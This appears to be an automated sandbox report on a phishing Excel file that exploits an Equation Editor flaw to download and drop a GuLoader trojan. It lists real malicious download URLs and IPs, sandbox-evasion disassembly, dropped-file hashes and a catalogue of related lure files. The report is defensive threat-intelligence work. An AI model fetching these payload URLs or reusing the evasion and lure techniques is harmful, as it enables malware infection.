                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E54E7 rdtsc
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740 | Thread sleep time: -240000s >= -30000s
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E54E7 rdtsc
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E50CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E2958 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E71A9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E6B93 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E341B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E7D52 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp | Binary or memory string: !Progman
                Source: C:\Users\Public\vbc.exe | Code function: 6_2_003E2183 cpuid
                Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Exploitation for Client Execution 12 | Path Interception | Process Injection 12 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 41 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 11 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 121 | SIM Card Swap | Carrier Billing Fraud | 
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | 
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 313 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | 

                Behavior Graph

                Screenshots


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                MTIR21487610_0062180102_20210714081247.PDF.xlsx | 28% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | 42% | Virustotal | -
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | 14% | Metadefender | -
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | 31% | ReversingLabs | Win32.Trojan.Vebzenpak
                C:\Users\Public\vbc.exe | 42% | Virustotal | -
                C:\Users\Public\vbc.exe | 14% | Metadefender | -
                C:\Users\Public\vbc.exe | 31% | ReversingLabs | Win32.Trojan.Vebzenpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                Source | Detection | Scanner | Label
                http://ceattire.com/bin_UYDMbHwI28.bin | 0% | Avira URL Cloud | safe
                http://180.214.239.39/cpu/.svchost.exe | 0% | Avira URL Cloud | safe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://ceattire.com/bin_UYDMbHwI28.bin | true | Avira URL Cloud: safe | unknown
                http://180.214.239.39/cpu/.svchost.exe | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.day.com/dam/1.0 | 300F3110.emf.0.dr | false | - | high

                  Contacted IPs


                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  180.214.239.39 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

                  General Information

                  Joe Sandbox Version: 33.0.0 White Diamond
                  Analysis ID: 449166
                  Start date: 15.07.2021
                  Start time: 11:05:26
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 6m 37s
                  Hypervisor based Inspection enabled: false
                  Report type: light
                  Sample file name: MTIR21487610_0062180102_20210714081247.PDF.xlsx
                  Cookbook file name: defaultwindowsofficecookbook.jbs
                  Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of new started processes analysed: 5
                  Number of new started drivers analysed: 2
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Detection: MAL
                  Classification: mal100.troj.expl.evad.winXLSX@4/11@0/1
                  EGA Information: Failed
                  HDC Information: Failed
                  HCA Information:
                  • Successful, ratio: 53%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  11:06:04 | API Interceptor | 71x Sleep call for process: EQNEDT32.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  Match: 180.214.239.39
                  Associated Sample Name / URL | Detection | Context
                  Booking Confirmation.xlsx | malicious | 180.214.239.39/port/.svchost.exe
                  6306093940.xlsx | malicious | 180.214.239.39/ssh/.svchost.exe
                  6306093940.xlsx | malicious | 180.214.239.39/mssn/.svchost.exe

                  Domains

                  No context

                  ASN

                  Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
                  Associated Sample Name / URL | Detection | Context
                  Booking Confirmation.xlsx | malicious | 180.214.239.39
                  kung.xlsx | malicious | 103.140.250.43
                  TT PAYMENT CONFIRMATION.xlsx | malicious | 103.89.90.94
                  lokibot.docx | malicious | 103.133.106.144
                  payment advice.exe | malicious | 103.89.91.38
                  PROFORMA INVOICE.xlsx | malicious | 103.140.250.43
                  INVM220210055600512.xlsx | malicious | 103.89.90.94
                  xP0clPWhrv.exe | malicious | 103.133.106.117
                  Doc1892071321.exe | malicious | 103.133.104.146
                  http___103.89.90.94_suket_wininit.exe | malicious | 103.89.90.94
                  DOC.1000000567.267805032019.doc__.rtf | malicious | 103.133.106.117
                  shipping quote.xlsx | malicious | 103.140.250.43
                  INVM220210055600512.xlsx | malicious | 103.89.90.94
                  NEW ORDER.xlsx | malicious | 103.140.250.43
                  OUTSTANDING SOA.xlsx | malicious | 103.145.253.94
                  6306093940.xlsx | malicious | 180.214.239.39
                  INVM220210055600512.xlsx | malicious | 103.89.90.94
                  pXL06trbQ2.exe | malicious | 103.133.106.117
                  DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc | malicious | 103.133.106.117
                  11.xlsx | malicious | 103.140.250.43

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  Match | Associated Sample Name / URL | Detection
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | Booking Confirmation.xlsx | malicious
                  C:\Users\Public\vbc.exe | Booking Confirmation.xlsx | malicious

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
                      Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Category: downloaded
                      Size (bytes): 267376
                      Entropy (8bit): 4.7769054763067915
                      Encrypted: false
                      SSDEEP: 1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                      MD5: FCFB0EC70F1419EDE8A534CC95CB61E9
                      SHA1: D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                      SHA-256: FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                      SHA-512: FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                      Malicious: true
                      Yara Hits:
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Author: Joe Security
                      Antivirus:
                      • Antivirus: Virustotal, Detection: 42%
                      • Antivirus: Metadefender, Detection: 14%
                      • Antivirus: ReversingLabs, Detection: 31%
                      Joe Sandbox View:
                      • Filename: Booking Confirmation.xlsx, Detection: malicious
                      Reputation: low
                      IE Cache URL: http://180.214.239.39/cpu/.svchost.exe
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B2651CA.jpeg
                      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type: [TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                      Category: dropped
                      Size (bytes): 62140
                      Entropy (8bit): 7.529847875703774
                      Encrypted: false
                      SSDEEP: 1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                      MD5: 722C1BE1697CFCEAE7BDEFB463265578
                      SHA1: 7D300A2BAB951B475477FAA308E4160C67AD93A9
                      SHA-256: 2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                      SHA-512: 2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                      Malicious: false
                      Reputation: moderate, very likely benign file
                      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf
                      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category: dropped
                      Size (bytes): 648132
                      Entropy (8bit): 2.8121852211833085
                      Encrypted: false
                      SSDEEP: 3072:I34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:y4UcLe0JOcXuunhqcS
                      MD5: DDF289FE9FBEE88B186842F4CA188ABC
                      SHA1: D15B3CE044EA211660351020692DA491E83C1480
                      SHA-256: 96A9A2298922548EA172E06B5945D134D0937502B85C2461A1F4DD211FB815D7
                      SHA-512: 6C8B7DCB7B91DD41F9EEA3E2BB1F963161B450FE8C0FF4A00D0FF91DF11302073087D36AB2B7422225FB86709C468684AC25B00717216F279EC904B7AB1BDF07
                      Malicious: false
                      Reputation: low
                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................P$...0./..f.P.@V.%...../.P./......./.4./.RQ.Q../.../......./.../.$Q.Q../.../. ...Id.P../.../. ............d.P........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........@./.X...../.../..8.P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48E1DDD1.emf
                      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category: dropped
                      Size (bytes): 7608
                      Entropy (8bit): 5.076880855619051
                      Encrypted: false
                      SSDEEP: 96:+SHfCsL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5KcjU+H3tWa6WdTfOYLpR8d
                      MD5: 55187CB63A1502A53DFF777D0ED28018
                      SHA1: 9C1CD11BEC1ACADE219D95701D4906DF54719DEC
                      SHA-256: 533B9EF863D579278C5903883DD56C133585D35D011492158E9CC474165B984B
                      SHA-512: 33741FFD87CE2E83E23CF26AE52E3A5AB69F5E7CE317E88326E13A4ADF18EC1BE7329AEF3EABB35AB5ED91C3F4FA83483F97B579D44EEB6548BFA935291EF394
                      Malicious: false
                      Reputation: low
                      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................5.6.).X.......d.......................@...'.q....\..................W.q.........6.v_.q......q.k5.Dy.wX.................w....$.......d.......$...J^.q.... ^.q0..X...m......-.......<.w................<..v.Zkv....X.zT.....k5.......................lvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B42899E.jpeg
                      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                      Category: dropped
                      Size (bytes): 85020
                      Entropy (8bit): 7.2472785111025875
                      Encrypted: false
                      SSDEEP: 768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                      MD5: 738BDB90A9D8929A5FB2D06775F3336F
                      SHA1: 6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                      SHA-256: 8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                      SHA-512: 48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                      Malicious: false
                      Reputation: moderate, very likely benign file
                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\750B075C.png
                      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type: PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                      Category: dropped
                      Size (bytes): 94963
                      Entropy (8bit): 7.9700481154985985
                      Encrypted: false
                      SSDEEP: 1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                      MD5: 17EC925977BED2836071429D7B476809
                      SHA1: 7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                      SHA-256: 83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                      SHA-512: 3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                      Malicious: false
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95A3F107.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                      Category:dropped
                      Size (bytes):62140
                      Entropy (8bit):7.529847875703774
                      Encrypted:false
                      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                      MD5:722C1BE1697CFCEAE7BDEFB463265578
                      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                      Malicious:false
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A242A343.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                      Category:dropped
                      Size (bytes):94963
                      Entropy (8bit):7.9700481154985985
                      Encrypted:false
                      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                      MD5:17EC925977BED2836071429D7B476809
                      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                      Malicious:false
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7A07AD.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                      Category:dropped
                      Size (bytes):85020
                      Entropy (8bit):7.2472785111025875
                      Encrypted:false
                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                      Malicious:false
                      C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):330
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                      Malicious:true
                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      C:\Users\Public\vbc.exe
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):267376
                      Entropy (8bit):4.7769054763067915
                      Encrypted:false
                      SSDEEP:1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                      MD5:FCFB0EC70F1419EDE8A534CC95CB61E9
                      SHA1:D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                      SHA-256:FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                      SHA-512:FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                      Antivirus:
                      • Antivirus: Virustotal, Detection: 42%, Browse
                      • Antivirus: Metadefender, Detection: 14%, Browse
                      • Antivirus: ReversingLabs, Detection: 31%
                      Joe Sandbox View:
                      • Filename: Booking Confirmation.xlsx, Detection: malicious, Browse
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:CDFV2 Encrypted
                      Entropy (8bit):7.994138372411622
                      TrID:
                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                      File name:MTIR21487610_0062180102_20210714081247.PDF.xlsx
                      File size:1268792
                      MD5:168c2cabea51b16aa19a152a652254f5
                      SHA1:477715c6a9d3219ea85a60eac9c80af83a102357
                      SHA256:9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
                      SHA512:fe86fb777b4f1985fe62a65a55474f3509cc512d348a09dd52e5573b158c3948fefef073e1a451624c5f000a94f673334ce6e33ae0a5f5254a4b3913353da7c1
                      SSDEEP:24576:umfPHCGbjiYxz58oRX1HjpN4V0g9LxJMmKu5QL6HiIFjQrcFE://Hi4z5DVj0OgWu5Q2CIFjKcFE

                      File Icon

                      Icon Hash:e4e2aa8aa4b4bcb4

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "MTIR21487610_0062180102_20210714081247.PDF.xlsx"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:True
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:False
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:False

                      Streams

                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                      General
                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                      File Type:data
                      Stream Size:64
                      Entropy:2.73637206947
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                      General
                      Stream Path:\x6DataSpaces/DataSpaceMap
                      File Type:data
                      Stream Size:112
                      Entropy:2.7597816111
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
                      General
                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                      File Type:data
                      Stream Size:208
                      Entropy:3.35153409046
                      Base64 Encoded:False
                      Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
